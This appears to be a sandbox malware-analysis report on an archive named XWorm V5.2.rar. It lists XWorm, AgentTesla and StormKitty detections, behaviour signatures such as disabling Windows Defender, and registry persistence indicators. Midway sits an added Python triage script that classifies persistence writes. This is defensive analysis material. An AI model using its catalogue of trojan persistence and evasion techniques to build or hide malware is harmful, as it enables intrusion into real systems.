Analysis Overview
SHA256
fa4e6545f776160094004f3bfc1c9e199ec43e22870b1674b48ecc9a80ec71fb
Threat Level: Known bad
The file XWorm V5.2.rar was found to be: Known bad.
Malicious Activity Summary
StormKitty payload
AgentTesla payload
Stormkitty family
Xworm
Detect Xworm Payload
AgentTesla
Contains code to disable Windows Defender
Agenttesla family
AgentTesla payload
Sets file execution options in registry
Downloads MZ/PE file
Modifies Installed Components in the registry
Obfuscated with Agile.Net obfuscator
Registers COM server for autorun
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Uses the VBS compiler for execution
Checks installed software on the system
Installs/modifies Browser Helper Object
Adds Run key to start application
Looks up external IP address via web service
Checks system information in the registry
Drops file in System32 directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
System policy modification
Suspicious use of SendNotifyMessage
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: AddClipboardFormatListener
Modifies Internet Explorer settings
Modifies registry class
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Download via BitsAdmin
Suspicious behavior: GetForegroundWindowSpam
Checks SCSI registry key(s)
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-16 13:00
Signatures
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Agenttesla family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stormkitty family
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-16 13:00
Reported
2024-05-16 13:21
Platform
win10v2004-20240426-en
Max time kernel
1199s
Max time network
1200s
Command Line
Signatures
AgentTesla
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
Sets file execution options in registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe | C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" | C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\XClient.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\e5f39b6\winzip28-lan.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14}\LocalServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{B54934CD-71A6-4698-BDC2-AFEA5B86504C}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\INPROCSERVER32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14}\LocalServer32\ServerExecutable = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\notification_click_helper.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B54934CD-71A6-4698-BDC2-AFEA5B86504C}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2405-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2405-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\notification_helper.exe\"" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\INPROCSERVER32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32\ServerExecutable = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\notification_helper.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\BHO\\ie_to_edge_bho_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\PdfPreview\\PdfPreviewHandler.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B54934CD-71A6-4698-BDC2-AFEA5B86504C}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\EBWebView\\x64\\EmbeddedBrowserWebView.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\notification_click_helper.exe\"" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | C:\Users\Admin\Downloads\7z2405-x64.exe | N/A |
Uses the VBS compiler for execution
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\!BCILauncher = "\"C:\\Windows\\Temp\\MUBSTemp\\BCILauncher.EXE\" bgaupmi=5A4941436A5B41B98951FE8BC14A1C5C" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BFFC50DF-F311-4333-81BC-37376CAA023B}\BGAUpdate.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\msedge_resetsb_{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062} = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window --reset-startup-boost-last-used" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
Checks installed software on the system
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
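Reading the Process column across the registry signatures above, every persistence write in this run (Active Setup StubPath, the Image File Execution Options key, the RunOnce entries, the Browser Helper Object and the CLSID InprocServer32/LocalServer32 registrations) is performed by the Microsoft Edge updater/installer binaries under `C:\Program Files (x86)\Microsoft\EdgeUpdate` and `C:\Program Files (x86)\Microsoft\Temp`, or by the 7-Zip installer in `Downloads`; the processes that are not under those paths (`XClient.exe`, `mshta.exe`, `winzip28-lan.exe`) appear only in query and lookup signatures. The script below is an added triage helper, not part of this report or of any sandbox vendor's tooling: it parses rows in the report's own `Description | Indicator | Process | Target` layout, tags each registry indicator with the persistence mechanism it touches, and separates writes attributed to known installer paths from everything else so an analyst can see which rows still need a look. The installer path prefixes are an assumption made for this example, and the six input rows are constructed by copying rows from the tables above.

```python
import re

# Constructed input: six rows copied from the signature tables in this report, in the
# report's own "| Description | Indicator | Process | Target |" layout.
SAMPLE_ROWS = r"""
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" | C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\!BCILauncher = "\"C:\\Windows\\Temp\\MUBSTemp\\BCILauncher.EXE\" bgaupmi=5A4941436A5B41B98951FE8BC14A1C5C" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BFFC50DF-F311-4333-81BC-37376CAA023B}\BGAUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | C:\Users\Admin\Downloads\7z2405-x64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\XClient.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
"""

# One table row: four cells separated by "|"; none of the cells in this report contain "|".
ROW_RE = re.compile(r"^\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|$")

# Registry locations that give code execution at logon / process start / COM activation.
PERSISTENCE_PATTERNS = [
    ("Active Setup", re.compile(r"\\Active Setup\\Installed Components\\", re.I)),
    ("IFEO", re.compile(r"\\Image File Execution Options\\", re.I)),
    ("Run/RunOnce", re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)),
    ("BHO", re.compile(r"\\Browser Helper Objects\\", re.I)),
    ("COM server", re.compile(r"\\CLSID\\\{[0-9A-F-]+\}\\(InprocServer32|LocalServer32)", re.I)),
]

# Descriptions that change the registry; "Key opened" / "Key value queried" are reads.
WRITE_OPS = ("Set value", "Key created", "Key deleted")

# Assumption for this example: processes under these paths are the Edge updater and the
# 7-Zip installer that ran during detonation, so their writes are attributed to installers.
INSTALLER_PREFIXES = (
    "c:\\program files (x86)\\microsoft\\edgeupdate\\",
    "c:\\program files (x86)\\microsoft\\temp\\",
    "c:\\users\\admin\\downloads\\7z",
)


def parse_rows(text):
    """Turn report table rows into dicts; lines that are not rows are skipped."""
    events = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        desc, indicator, process, target = m.groups()
        events.append({"description": desc, "indicator": indicator,
                       "process": process, "target": target})
    return events


def classify(event):
    """Tag a row with: did it write, which persistence location, and who is credited."""
    is_write = event["description"].startswith(WRITE_OPS)
    category = next((name for name, rx in PERSISTENCE_PATTERNS
                     if rx.search(event["indicator"])), None)
    attribution = ("installer" if event["process"].lower().startswith(INSTALLER_PREFIXES)
                   else "review")
    return {**event, "write": is_write, "category": category, "attribution": attribution}


def triage(text):
    return [classify(e) for e in parse_rows(text)]


def summarize(events):
    """Per attribution bucket, map each process to the persistence locations it wrote."""
    out = {"installer": {}, "review": {}}
    for e in events:
        bucket = out[e["attribution"]].setdefault(e["process"], [])
        if e["write"] and e["category"] and e["category"] not in bucket:
            bucket.append(e["category"])
    return out


if __name__ == "__main__":
    for bucket, procs in summarize(triage(SAMPLE_ROWS)).items():
        print(f"[{bucket}]")
        for proc, cats in procs.items():
            print(f"  {proc}: {', '.join(cats) if cats else 'no persistence writes'}")
```

Run on the full report, the `review` bucket is the short list worth an analyst's time; an empty category list there means the process only read the registry in the rows seen, which is what the tables above show for `XClient.exe` and `mshta.exe`. The prefix list is deliberately narrow: a sample that drops itself under a Microsoft-looking path would be misattributed, so treat the `installer` bucket as a filter for a known-clean baseline, not as proof of benign origin.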
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
Drops file in Program Files directory
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\wermgr.exe | N/A |
